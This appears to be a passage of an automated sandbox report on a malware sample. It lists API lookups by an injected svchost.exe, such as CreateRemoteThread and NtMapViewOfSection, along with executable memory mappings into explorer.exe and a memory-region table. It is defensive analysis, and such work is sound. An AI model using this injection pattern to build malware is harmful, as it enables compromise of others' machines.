| Get Filename | KERNEL32.dll | process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\system32\svchost.exe, size = 260 |
|
1 | |
| Get Filename | c:\windows\system32\ntdll.dll | process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
3 | |
| Get Address | - | function = sprintf, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = NtMapViewOfSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = NtUnmapViewOfSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = NtCreateSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ZwOpenProcessToken, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ZwClose, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ZwQueryInformationToken, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ZwOpenProcess, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = strcpy, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = NtQuerySystemInformation, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = RtlNtStatusToDosError, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ZwQueryInformationProcess, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = _snprintf, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = _wcsupr, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = _strupr, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = memmove, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = wcscpy, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = memset, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = RtlFreeUnicodeString, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ZwQueryKey, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = RtlUpcaseUnicodeString, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = wcstombs, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = RtlAdjustPrivilege, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = mbstowcs, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = RtlImageNtHeader, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = memcpy, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = __C_specific_handler, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetFileAttributesW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = VirtualProtectEx, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = FileTimeToLocalFileTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = QueueUserWorkItem, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = FindFirstFileA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetFileTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = FindNextFileA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CompareFileTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ExpandEnvironmentStringsA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetCurrentProcessId, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetVersion, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetLocalTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetModuleFileNameA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CreateDirectoryA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetLastError, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = HeapFree, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = RemoveDirectoryA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CloseHandle, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CreateFileA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = DeleteFileA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = lstrcpyA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = lstrlenA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = lstrcatA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = WriteFile, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = HeapAlloc, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = HeapDestroy, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = HeapCreate, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = SetEvent, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = HeapReAlloc, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = SuspendThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = lstrcmpiW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ResumeThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetModuleHandleA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = lstrcpyW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CreateFileW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CreateThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = lstrcatW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = SwitchToThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = Sleep, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetTickCount, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CopyFileW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = SetWaitableTimer, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetCurrentThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetCurrentThreadId, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = DuplicateHandle, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = lstrlenW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CreateEventA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetWindowsDirectoryA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = DeleteFileW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CreateDirectoryW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetTempPathA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = WaitForSingleObject, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = OpenProcess, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = WaitForMultipleObjects, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = lstrcmpA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ResetEvent, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CreateMutexA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = MapViewOfFile, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = OpenWaitableTimerA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = OpenMutexA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ReleaseMutex, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetVersionExA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CreateWaitableTimerA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = SetLastError, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = lstrcmpiA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = InitializeCriticalSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = EnterCriticalSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = LeaveCriticalSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = UnregisterWait, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = RegisterWaitForSingleObject, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = TlsAlloc, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = TlsGetValue, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = LoadLibraryExW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = TlsSetValue, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetFileAttributesA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = OpenFileMappingA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetExitCodeProcess, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetComputerNameW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetFileSize, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CreateProcessA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CreateFileMappingA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetDriveTypeW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = WideCharToMultiByte, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetLogicalDriveStringsW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = lstrcpynA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GlobalUnlock, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = LocalFree, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GlobalLock, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = Thread32First, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CreateToolhelp32Snapshot, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = QueueUserAPC, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = OpenThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = Thread32Next, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ReadFile, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ConnectNamedPipe, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetOverlappedResult, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CancelIo, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = DisconnectNamedPipe, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = FlushFileBuffers, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CallNamedPipeA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = CreateNamedPipeA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetSystemTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = WaitNamedPipeA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = SleepEx, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = OpenEventA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ExitThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = LocalAlloc, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = FreeLibrary, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = RaiseException, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = VirtualFree, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetModuleFileNameW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = FileTimeToSystemTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = DeleteCriticalSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = ExpandEnvironmentStringsW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = FindClose, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = GetTempFileNameA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = SetEndOfFile, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = FindNextFileW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = SetFilePointer, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = FindFirstFileW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | - | function = RemoveDirectoryW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x76cd91d0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x7feff12d710 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrRChrA, address_out = 0x7fefe594c9c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x76e6bae8 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x7feff12dc20 |
|
1 | |
| Get Address | c:\windows\system32\psapi.dll | function = EnumProcessModules, address_out = 0x770b1050 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegOpenKeyA, address_out = 0x7feff12d6d0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegQueryValueExA, address_out = 0x7feff13c480 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7feff140710 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrToIntExA, address_out = 0x7fefe5bff88 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrChrA, address_out = 0x7fefe5aaf54 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrTrimA, address_out = 0x7fefe5c06a4 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetShellWindow, address_out = 0x76e054a0 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetWindowThreadProcessId, address_out = 0x76e00a90 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlExitUserThread, address_out = 0x76f36930 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateRemoteThread, address_out = 0x76d1c4f0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyA, address_out = 0x7feff127c50 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameW, address_out = 0x7feff131fd0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegSetValueExA, address_out = 0x7feff131dc0 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 717736 |
|
1 | |
| Map | - | process_name = c:\windows\system32\svchost.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x420000 |
|
1 | |
| Map | - | process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x3fa0000 |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | - |
|
1 | |
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Time | type = System Time, time = 2018-03-29 15:43:40 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-03-29 15:43:41 (UTC) |
|
1 | |
| Get Info | type = Operating System |
|
2 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = {B29A7695-69BA-B440-8306-AD28679A31DC} |
|
1 |
Process #6: explorer.exe
478
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\explorer.exe |
| Command Line | C:\Windows\Explorer.EXE |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:48, Reason: Injection |
| Unmonitor | End Time: 00:02:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:45 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5a8 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A90
0x
270
0x
780
0x
45C
0x
428
0x
328
0x
134
0x
420
0x
788
0x
7A4
0x
790
0x
548
0x
7C4
0x
7B8
0x
79C
0x
724
0x
70C
0x
6FC
0x
6F8
0x
6F4
0x
6F0
0x
6E4
0x
6D4
0x
6D0
0x
6CC
0x
6A4
0x
5DC
0x
5D8
0x
5D0
0x
5CC
0x
5C8
0x
5B4
0x
5AC
0x
8CC
0x
8E4
0x
8B8
0x
718
0x
75C
0x
974
0x
908
0x
90C
0x
A04
0x
760
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00110000 | 0x00176fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x0023ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00240fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x0042efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x006c7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x00850fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x01c5ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001c60000 | 0x01c60000 | 0x02052fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002060000 | 0x02060000 | 0x02061fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002070000 | 0x02070000 | 0x02070fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002080000 | 0x02080000 | 0x02081fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002090000 | 0x02090000 | 0x020a5fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000020b0000 | 0x020b0000 | 0x020b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000020c0000 | 0x020c0000 | 0x020c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020d0000 | 0x020d0000 | 0x020e5fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000020f0000 | 0x020f0000 | 0x020f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002100000 | 0x02100000 | 0x02100fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002110000 | 0x02110000 | 0x02110fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002120000 | 0x02120000 | 0x02121fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002130000 | 0x02130000 | 0x02131fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002140000 | 0x02140000 | 0x021bffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x021c0000 | 0x0248efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002490000 | 0x02490000 | 0x02491fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| comctl32.dll.mui | 0x024a0000 | 0x024a2fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x024b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024c0000 | 0x024c0000 | 0x024e3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024f0000 | 0x024f0000 | 0x024f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002500000 | 0x02500000 | 0x02508fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002510000 | 0x02510000 | 0x0258ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002590000 | 0x02590000 | 0x025e7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025f0000 | 0x025f0000 | 0x0265bfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002660000 | 0x02660000 | 0x026a7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000026b0000 | 0x026b0000 | 0x026b3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000026c0000 | 0x026c0000 | 0x026c7fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000026d0000 | 0x026d0000 | 0x026d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000026e0000 | 0x026e0000 | 0x027dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000027e0000 | 0x027e0000 | 0x028dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000028e0000 | 0x028e0000 | 0x028e1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000028f0000 | 0x028f0000 | 0x028f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| index.dat | 0x02900000 | 0x0290bfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x02910000 | 0x02917fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x02920000 | 0x0292ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002930000 | 0x02930000 | 0x02930fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| index.dat | 0x02940000 | 0x0294ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x02a2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002ab0000 | 0x02ab0000 | 0x02ab1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| actioncenter.dll.mui | 0x02ac0000 | 0x02ac4fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002ae0000 | 0x02ae0000 | 0x02e22fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02e33fff | Private Memory | Readable, Writable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02e40000 | 0x02e5ffff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002e60000 | 0x02e60000 | 0x02edffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002ee0000 | 0x02ee0000 | 0x02ee0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x02ef0000 | 0x02ef3fff | Memory Mapped File | Readable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x02f00000 | 0x02f2ffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x02f30000 | 0x02f33fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002f40000 | 0x02f40000 | 0x02fbffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002fc0000 | 0x02fc0000 | 0x0303ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003040000 | 0x03040000 | 0x03041fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003050000 | 0x03050000 | 0x030cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000030d0000 | 0x030d0000 | 0x030d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000030e0000 | 0x030e0000 | 0x0315ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x03160000 | 0x031c5fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000031d0000 | 0x031d0000 | 0x031d0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000031e0000 | 0x031e0000 | 0x031e1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x031f0000 | 0x031f3fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000003200000 | 0x03200000 | 0x03201fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| {40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db | 0x03210000 | 0x03210fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x03220000 | 0x03223fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000003230000 | 0x03230000 | 0x03231fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x03240000 | 0x03243fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000003250000 | 0x03250000 | 0x03250fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000003260000 | 0x03260000 | 0x03261fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000003270000 | 0x03270000 | 0x03271fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000003280000 | 0x03280000 | 0x03281fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x03290fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032a0000 | 0x032a0000 | 0x032a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032b0000 | 0x032b0000 | 0x032b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032c0000 | 0x032c0000 | 0x032c0fff | Private Memory | Readable, Writable |
|
|
|
- |
